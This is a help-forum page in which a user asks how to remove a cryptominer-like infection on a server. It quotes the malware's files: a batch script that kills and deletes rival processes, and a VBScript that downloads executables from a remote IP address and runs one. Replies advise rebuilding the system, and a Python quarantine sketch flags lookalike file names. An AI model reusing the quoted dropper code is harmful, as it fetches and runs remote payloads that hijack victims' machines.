How to permanently kill steam client bootstrapper
I want to share a workaround that I found for my problem.
As a programmer, I've created a program that constantly monitors the folder `c:\ProgramData\` for any new files. If any of the files that belong to "steam client bootstrapper" appear inside that folder, my program deletes those files before they are executed. If anybody needs to modify this utility, you can find it on GitHub.
After I executed this primitive antivirus (actually antiPUP), my system stopped being slow. One more detail that is required for this program to work stably is that the folder `c:\ProgramData\copyForVirus\` must be created. I've made the program create a copy of those virus files in order to analyze them later in some VMware environment to see what the internals of those files are.
Yuriy Zaletskyy
Updated on September 18, 2022
Comments
- Yuriy Zaletskyy almost 2 years
I have the following situation in my task manager:
I don't know what kind of app it is, but definitely not Steam client bootstrapper because I didn't install it and also can't uninstall it.
If I try to figure out what kind of app it is via this step:
I see something like this:
In MS Config utility I didn't find anything that looks like `secury.exe`. When I open the file location, I see three files: `m.bat`, `b.exe`, `4.vbs`. Below goes the content of `m.bat`:

```bat
taskkill /f /t /im secury.exe c:\ProgramData\secury.exe
taskkill /f /t /im kingsoft.exe
taskkill /f /t /im expl0rer.exe
taskkill /f /t /im ieplare.exev
taskkill /f /t /im nssm.exe
taskkill /f /t /im MSASCui.exe
taskkill /f /t /im SystemSettlngs.exe
taskkill /f /t /im SystemSetting.exe
taskkill /f /t /im Process.exe
taskkill /f /t /im winlnlt.exe
taskkill /f /t /im WindowsUpgrade.exe
taskkill /f /t /im msdc.exe
taskkill /f /t /im Fiddlere.exe
taskkill /f /t /im shovst.exe
taskkill /f /t /im lqrtqe.exe
taskkill /f /t /im apkls.exe
taskkill /f /t /im winlog.exe
taskkill /f /t /im svchosts.exe
taskkill /f /t /im win1ogins.exe
taskkill /f /t /im shovsts.exe
taskkill /f /t /im fcty.exe
taskkill /f /t /im soiuos.exe
taskkill /f /t /im TrustedInstaller.exe
del C:\Windows\System32\soiuos.exe
del C:\Windows\Setup\TrustedInstaller.exe
del C:\ProgramData\kingsoft.exe
del C:\ProgramData\expl0rer.exe
del C:\ProgramData\ieplare.exe
del C:\ProgramData\nssm.exe
del C:\ProgramData\MSASCui.exe
del C:\ProgramData\SystemSettlngs.exe
del C:\ProgramData\SystemSetting.exe
del C:\ProgramData\Process.exe
del C:\ProgramData\winlnlt.exe
del C:\ProgramData\WindowsUpgrade.exe
del C:\ProgramData\msdc.exe
del C:\ProgramData\Fiddlere.exe
del C:\ProgramData\shovst.exe
del C:\ProgramData\lqrtqe.exe
del C:\ProgramData\apkls.exe
del C:\ProgramData\winlog.exe
del C:\ProgramData\svchosts.exe
del C:\ProgramData\win1ogins.exe
del C:\ProgramData\shovsts.exe
del C:\ProgramData\fcty.exe
del C:\ProgramData\pool.exe
del C:\ProgramData\pool2.exe
del C:\ProgramData\pool3.exe
```

Next goes `4.vbs`:

```vbscript
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/2.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\ProgramData\s2.exe",2
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://223.68.209.7:65510/pool.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\ProgramData\pool2.exe",2
CreateObject("WScript.Shell").Run "C:\ProgramData\pool3.exe"
CreateObject("WScript.Shell").Run "del C:\ProgramData\pool3.exe"
```

What can I do in order to stop `secury.exe` from abusing computing powers of my server?

P.S. I've executed Avast full check of my computer, but it didn't find anything wrong.
- Admin over 6 years: That... looks awfully suspicious (the content of those batch files and the VBS). Any chance of you going into safe mode (and hopefully that thing is not running) and then you can try to delete them? If safe mode is not an option - boot from an external drive (or Linux LiveUSB/LiveCD) and with the HDD accessible - delete those files?
- Admin over 6 years: At this point you should assume that your computer has been completely compromised. You could run a number of virus checkers and pray that they've worked - but I'd recommend backing up everything of importance and then formatting and reinstalling Windows.
- Admin over 6 years: I deleted those files many times, but it didn't work
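The folder sweep described in the answer at the top of this page, sketched in Python as an added example (it is not the author's GitHub utility): one pass over a directory quarantines the file names that appear in `m.bat` and `4.vbs` and, going beyond the answer, names that imitate Windows binaries such as `expl0rer.exe` or `winlnlt.exe`. The `KNOWN` baseline, the `.quarantined` suffix and all function names are assumptions.

```python
import shutil
from pathlib import Path

# File names taken from m.bat and 4.vbs on this page.
LISTED = {"secury.exe", "s2.exe", "pool.exe", "pool2.exe", "pool3.exe"}
# Assumed baseline of genuine Windows image names; none of them belongs in the swept folder.
KNOWN = {"explorer.exe", "wininit.exe", "svchost.exe", "winlogon.exe",
         "systemsettings.exe", "trustedinstaller.exe", "msascui.exe"}
# Fold characters commonly swapped in masquerading names (0/o, 1/l, l/i) together.
SKELETON = str.maketrans({"0": "o", "1": "i", "l": "i"})

def skeleton(name):
    return name.lower().translate(SKELETON)

def edit_distance(a, b):
    """Levenshtein distance, row by row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify(name):
    """Return 'listed', 'misplaced', 'lookalike:<target>' or None for a file name."""
    low = name.lower()
    if low in LISTED:
        return "listed"
    if low in KNOWN:
        return "misplaced"  # genuine name, but outside its install directory
    for good in sorted(KNOWN):
        if edit_distance(skeleton(low), skeleton(good)) <= 1:
            return "lookalike:" + good
    return None

def sweep(watch_dir, quarantine_dir):
    """Move flagged files into quarantine_dir; return {file name: verdict}."""
    quarantine = Path(quarantine_dir)
    quarantine.mkdir(parents=True, exist_ok=True)
    hits = {}
    for p in sorted(Path(watch_dir).iterdir()):
        verdict = classify(p.name) if p.is_file() else None
        if verdict:
            shutil.move(str(p), str(quarantine / (p.name + ".quarantined")))
            hits[p.name] = verdict
    return hits
```

A sweep like this only removes dropped files; whatever keeps recreating them is untouched, which matches the last comment above about deleting the files many times.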